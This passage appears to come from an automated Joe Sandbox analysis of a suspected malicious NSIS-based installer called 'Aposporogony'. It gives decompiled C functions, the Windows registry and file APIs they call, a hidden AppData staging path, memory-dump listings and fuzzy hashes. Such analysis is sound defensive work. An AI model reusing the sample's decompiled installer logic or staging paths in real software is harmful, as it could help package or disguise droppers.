                                                                                                                                                                                      							continue;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t18 = E00405F90( *0x40a01c, 0x40ced0, _t37); // executed
                                                                                                                                                                                      					if(_t18 == 0) {
                                                                                                                                                                                      						_push(0xfffffffe);
                                                                                                                                                                                      						L21:
                                                                                                                                                                                      						_pop(_t15);
                                                                                                                                                                                      						return _t15;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *0x40ce40 =  *0x40ce40 + _t37;
                                                                                                                                                                                      					_t49 =  *0x40ce64; // 0x0
                                                                                                                                                                                      					if(_t49 != 0) {
                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L16;
                                                                                                                                                                                      					L20:
                                                                                                                                                                                      					_push(0xfffffffd);
                                                                                                                                                                                      					goto L21;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t12 | 0xffffffff;
                                                                                                                                                                                      			}

















                                                                                                                                                                                      0x004032e1
                                                                                                                                                                                      0x004032ee
                                                                                                                                                                                      0x00403301
                                                                                                                                                                                      0x00403306
                                                                                                                                                                                      0x00403436
                                                                                                                                                                                      0x00403438
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040343e
                                                                                                                                                                                      0x00403312
                                                                                                                                                                                      0x00403325
                                                                                                                                                                                      0x0040332b
                                                                                                                                                                                      0x00403331
                                                                                                                                                                                      0x0040333c
                                                                                                                                                                                      0x0040333c
                                                                                                                                                                                      0x00403341
                                                                                                                                                                                      0x00403346
                                                                                                                                                                                      0x0040334e
                                                                                                                                                                                      0x00403350
                                                                                                                                                                                      0x00403350
                                                                                                                                                                                      0x00403359
                                                                                                                                                                                      0x00403360
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403366
                                                                                                                                                                                      0x0040336c
                                                                                                                                                                                      0x00403372
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403378
                                                                                                                                                                                      0x0040337e
                                                                                                                                                                                      0x00403388
                                                                                                                                                                                      0x0040339e
                                                                                                                                                                                      0x004033a3
                                                                                                                                                                                      0x004033a8
                                                                                                                                                                                      0x004033ae
                                                                                                                                                                                      0x004033b4
                                                                                                                                                                                      0x004033be
                                                                                                                                                                                      0x004033c5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004033c7
                                                                                                                                                                                      0x004033cd
                                                                                                                                                                                      0x004033cf
                                                                                                                                                                                      0x004033f2
                                                                                                                                                                                      0x004033f8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004033fa
                                                                                                                                                                                      0x004033fc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004033fe
                                                                                                                                                                                      0x004033fe
                                                                                                                                                                                      0x00403411
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403420
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403420
                                                                                                                                                                                      0x004033d9
                                                                                                                                                                                      0x004033e0
                                                                                                                                                                                      0x0040342d
                                                                                                                                                                                      0x00403433
                                                                                                                                                                                      0x00403433
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403433
                                                                                                                                                                                      0x004033e2
                                                                                                                                                                                      0x004033e8
                                                                                                                                                                                      0x004033ee
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403431
                                                                                                                                                                                      0x00403431
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00403431
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                                                                                        • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                                                                                      • SetFilePointer.KERNELBASE(00045312,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1092082344-141101210
                                                                                                                                                                                      • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                                                                                      • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                                                                                                      • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                                                                                      • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                                                      			E004023E4(void* __eax, int __ebx, intOrPtr __edx) {
                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                      				int _t24;
                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                      				char _t27;
                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                      				void* _t32;
                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                      				intOrPtr _t37;
                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                      				void* _t42;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t33 = __edx;
                                                                                                                                                                                      				_t30 = __ebx;
                                                                                                                                                                                      				_t37 =  *((intOrPtr*)(_t39 - 0x18));
                                                                                                                                                                                      				_t34 = __eax;
                                                                                                                                                                                      				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
                                                                                                                                                                                      				 *(_t39 - 0x3c) = E00402C41(2);
                                                                                                                                                                                      				_t20 = E00402C41(0x11);
                                                                                                                                                                                      				 *(_t39 - 4) = 1;
                                                                                                                                                                                      				_t21 = E00402CD1(_t42, _t34, _t20, 2); // executed
                                                                                                                                                                                      				 *(_t39 + 8) = _t21;
                                                                                                                                                                                      				if(_t21 != __ebx) {
                                                                                                                                                                                      					_t24 = 0;
                                                                                                                                                                                      					if(_t37 == 1) {
                                                                                                                                                                                      						E00402C41(0x23);
                                                                                                                                                                                      						_t24 = lstrlenW(0x40b5d8) + _t29 + 2;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t37 == 4) {
                                                                                                                                                                                      						_t27 = E00402C1F(3);
                                                                                                                                                                                      						_pop(_t32);
                                                                                                                                                                                      						 *0x40b5d8 = _t27;
                                                                                                                                                                                      						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
                                                                                                                                                                                      						_t24 = _t37;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_t37 == 3) {
                                                                                                                                                                                      						_t24 = E004031D6(_t32,  *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d8, 0x1800); // executed
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d8, _t24); // executed
                                                                                                                                                                                      					if(_t25 == 0) {
                                                                                                                                                                                      						 *(_t39 - 4) = _t30;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_push( *(_t39 + 8));
                                                                                                                                                                                      					RegCloseKey(); // executed
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}















                                                                                                                                                                                      0x004023e4
                                                                                                                                                                                      0x004023e4
                                                                                                                                                                                      0x004023e4
                                                                                                                                                                                      0x004023e7
                                                                                                                                                                                      0x004023ee
                                                                                                                                                                                      0x004023f8
                                                                                                                                                                                      0x004023fb
                                                                                                                                                                                      0x00402404
                                                                                                                                                                                      0x0040240b
                                                                                                                                                                                      0x00402412
                                                                                                                                                                                      0x00402415
                                                                                                                                                                                      0x0040241b
                                                                                                                                                                                      0x00402425
                                                                                                                                                                                      0x00402429
                                                                                                                                                                                      0x00402434
                                                                                                                                                                                      0x00402434
                                                                                                                                                                                      0x0040243b
                                                                                                                                                                                      0x0040243f
                                                                                                                                                                                      0x00402444
                                                                                                                                                                                      0x00402445
                                                                                                                                                                                      0x0040244b
                                                                                                                                                                                      0x0040244e
                                                                                                                                                                                      0x0040244e
                                                                                                                                                                                      0x00402452
                                                                                                                                                                                      0x0040245e
                                                                                                                                                                                      0x0040245e
                                                                                                                                                                                      0x0040246f
                                                                                                                                                                                      0x00402477
                                                                                                                                                                                      0x00402479
                                                                                                                                                                                      0x00402479
                                                                                                                                                                                      0x0040247c
                                                                                                                                                                                      0x00402557
                                                                                                                                                                                      0x00402557
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm2525.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm2525.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsm2525.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsm2525.tmp
                                                                                                                                                                                      • API String ID: 2655323295-3391888777
                                                                                                                                                                                      • Opcode ID: 9d8341b865a93ceb5d55e7e6d4e8c59cacbf901b81be0855744a2d0075587d51
                                                                                                                                                                                      • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d8341b865a93ceb5d55e7e6d4e8c59cacbf901b81be0855744a2d0075587d51
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                      				int _t23;
                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                      				signed char _t26;
                                                                                                                                                                                      				short _t28;
                                                                                                                                                                                      				short _t31;
                                                                                                                                                                                      				short* _t34;
                                                                                                                                                                                      				void* _t36;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t28 = __ebx;
                                                                                                                                                                                      				 *(_t36 + 8) = E00402C41(0xfffffff0);
                                                                                                                                                                                      				_t17 = E00405D68(_t16);
                                                                                                                                                                                      				_t32 = _t17;
                                                                                                                                                                                      				if(_t17 != __ebx) {
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t34 = E00405CEA(_t32, 0x5c);
                                                                                                                                                                                      						_t31 =  *_t34;
                                                                                                                                                                                      						 *_t34 = _t28;
                                                                                                                                                                                      						if(_t31 != _t28) {
                                                                                                                                                                                      							L5:
                                                                                                                                                                                      							_t25 = E0040599C( *(_t36 + 8));
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
                                                                                                                                                                                      							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E004059B9(_t42) == 0) {
                                                                                                                                                                                      								goto L5;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t25 = E0040591F( *(_t36 + 8)); // executed
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t25 != _t28) {
                                                                                                                                                                                      							if(_t25 != 0xb7) {
                                                                                                                                                                                      								L9:
                                                                                                                                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                                                                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                                                                                                                                      									goto L9;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						 *_t34 = _t31;
                                                                                                                                                                                      						_t32 = _t34 + 2;
                                                                                                                                                                                      					} while (_t31 != _t28);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
                                                                                                                                                                                      					_push(0xfffffff5);
                                                                                                                                                                                      					E00401423();
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					E00401423(0xffffffe6);
                                                                                                                                                                                      					E004063E8(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism\\Scups",  *(_t36 + 8));
                                                                                                                                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                                                                                                                      					if(_t23 == 0) {
                                                                                                                                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}











                                                                                                                                                                                      0x004015c1
                                                                                                                                                                                      0x004015c9
                                                                                                                                                                                      0x004015cc
                                                                                                                                                                                      0x004015d1
                                                                                                                                                                                      0x004015d5
                                                                                                                                                                                      0x004015d7
                                                                                                                                                                                      0x004015df
                                                                                                                                                                                      0x004015e1
                                                                                                                                                                                      0x004015e4
                                                                                                                                                                                      0x004015ea
                                                                                                                                                                                      0x00401604
                                                                                                                                                                                      0x00401607
                                                                                                                                                                                      0x004015ec
                                                                                                                                                                                      0x004015ec
                                                                                                                                                                                      0x004015ef
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004015fa
                                                                                                                                                                                      0x004015fd
                                                                                                                                                                                      0x004015fd
                                                                                                                                                                                      0x004015ef
                                                                                                                                                                                      0x0040160e
                                                                                                                                                                                      0x00401615
                                                                                                                                                                                      0x00401624
                                                                                                                                                                                      0x00401624
                                                                                                                                                                                      0x00401617
                                                                                                                                                                                      0x0040161a
                                                                                                                                                                                      0x00401622
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00401622
                                                                                                                                                                                      0x00401615
                                                                                                                                                                                      0x00401627
                                                                                                                                                                                      0x0040162b
                                                                                                                                                                                      0x0040162c
                                                                                                                                                                                      0x004015d7
                                                                                                                                                                                      0x00401634
                                                                                                                                                                                      0x00401663
                                                                                                                                                                                      0x0040224b
                                                                                                                                                                                      0x00401636
                                                                                                                                                                                      0x00401638
                                                                                                                                                                                      0x00401645
                                                                                                                                                                                      0x0040164d
                                                                                                                                                                                      0x00401655
                                                                                                                                                                                      0x0040165b
                                                                                                                                                                                      0x0040165b
                                                                                                                                                                                      0x00401655
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,77272EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,77272EE0,00000000), ref: 00405D76
                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                                                                                        • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                        • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups, xrefs: 00401640
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Ogtiern\Hamiltonianism\Scups
                                                                                                                                                                                      • API String ID: 1892508949-4164907853
                                                                                                                                                                                      • Opcode ID: 84e1d395c7a1eacf590479eeff2890a4773ff24e364b7827ae1dc055116d0791
                                                                                                                                                                                      • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 84e1d395c7a1eacf590479eeff2890a4773ff24e364b7827ae1dc055116d0791
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                                      			E004062B6(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                      				long _t21;
                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                      				char* _t30;
                                                                                                                                                                                      
                                                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                                                      				_v8 = 0x800;
                                                                                                                                                                                      				_t21 = E00406255(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                                                                                                                      				_t30 = _a16;
                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8); // executed
                                                                                                                                                                                      					_t21 = RegCloseKey(_a20); // executed
                                                                                                                                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                                                                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return _t21;
                                                                                                                                                                                      			}







                                                                                                                                                                                      0x004062c4
                                                                                                                                                                                      0x004062c6
                                                                                                                                                                                      0x004062de
                                                                                                                                                                                      0x004062e3
                                                                                                                                                                                      0x004062e8
                                                                                                                                                                                      0x00406326
                                                                                                                                                                                      0x00406326
                                                                                                                                                                                      0x004062ea
                                                                                                                                                                                      0x004062fc
                                                                                                                                                                                      0x00406307
                                                                                                                                                                                      0x0040630d
                                                                                                                                                                                      0x00406318
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406318
                                                                                                                                                                                      0x0040632c

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm2525.tmp\System.dll), ref: 00406307
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                      • String ID: Call
                                                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                                                                      • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
